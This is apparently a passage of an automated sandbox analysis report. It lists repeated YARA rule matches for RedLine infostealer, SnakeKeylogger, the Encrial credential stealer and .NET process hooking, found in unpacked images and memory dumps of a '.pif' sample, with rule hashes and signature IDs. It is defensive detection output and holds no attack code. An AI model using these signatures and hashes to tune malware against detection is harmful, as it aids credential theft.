        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 11.2.Mxhvdwzh.PIF.2169cbd8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 12.1.hzwdvhxM.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.1.hzwdvhxM.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 14.2.hzwdvhxM.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 14.1.hzwdvhxM.pif.438038.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.1.hzwdvhxM.pif.438038.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 12.2.hzwdvhxM.pif.4da6c8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.2.hzwdvhxM.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 7.1.hzwdvhxM.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.2.hzwdvhxM.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 0000000E.00000001.1674039682.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 0000000E.00000002.3896243951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0000000C.00000002.3896211622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0000000C.00000001.1589020424.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
